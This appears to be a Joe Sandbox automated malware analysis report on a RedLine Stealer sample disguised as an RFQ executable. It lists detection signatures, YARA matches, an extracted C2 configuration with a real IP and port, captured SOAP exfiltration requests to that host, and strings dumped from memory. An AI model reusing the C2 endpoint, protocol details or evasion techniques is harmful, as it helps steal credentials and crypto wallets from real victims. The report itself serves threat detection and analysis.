Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ - FYKS - 06052022.exe

Overview

General Information

Sample Name:RFQ - FYKS - 06052022.exe
Analysis ID:634392
MD5:2a348d2b6798a26f0fb552108cb870fb
SHA1:f0500df6591299b7290a24234fce9d5ed843b553
SHA256:fd4c999083d99e6c8898be8cd29d281922d49754a1c7adb1b4d8bb0e7f69bb19
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Yara detected UAC Bypass using CMSTP
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large array initializations
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • RFQ - FYKS - 06052022.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe" MD5: 2A348D2B6798A26F0FB552108CB870FB)
    • RFQ - FYKS - 06052022.exe (PID: 6428 cmdline: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe MD5: 2A348D2B6798A26F0FB552108CB870FB)
      • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 20 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                1.0.RFQ - FYKS - 06052022.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  1.0.RFQ - FYKS - 06052022.exe.400000.12.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    1.0.RFQ - FYKS - 06052022.exe.400000.12.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      1.0.RFQ - FYKS - 06052022.exe.400000.12.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165e6:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165c7:$v2_6: GetUpdates
                      1.0.RFQ - FYKS - 06052022.exe.400000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 40 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6376, type: MEMORYSTR
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: RFQ - FYKS - 06052022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: Binary string: E:\A\_work\140\s\obj\Microsoft.ServiceHub.HostStub\Release\net472\Microsoft.ServiceHub.HostStub.pdb source: RFQ - FYKS - 06052022.exe

                        Networking

                        barindex
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49752
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPE
                        Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1137724Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1137716Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficTCP traffic: 192.168.2.3:49740 -> 185.222.58.90:17910
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:1
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:179108
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.317080374.0000000001551000.00000004.00000020.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000003.331533019.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.rea
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362768565.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.r
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.a
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362613238.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme8
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: RFQ - FYKS - 06052022.exeString found in binary or memory: http://www.random.org/sequences/
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.adob
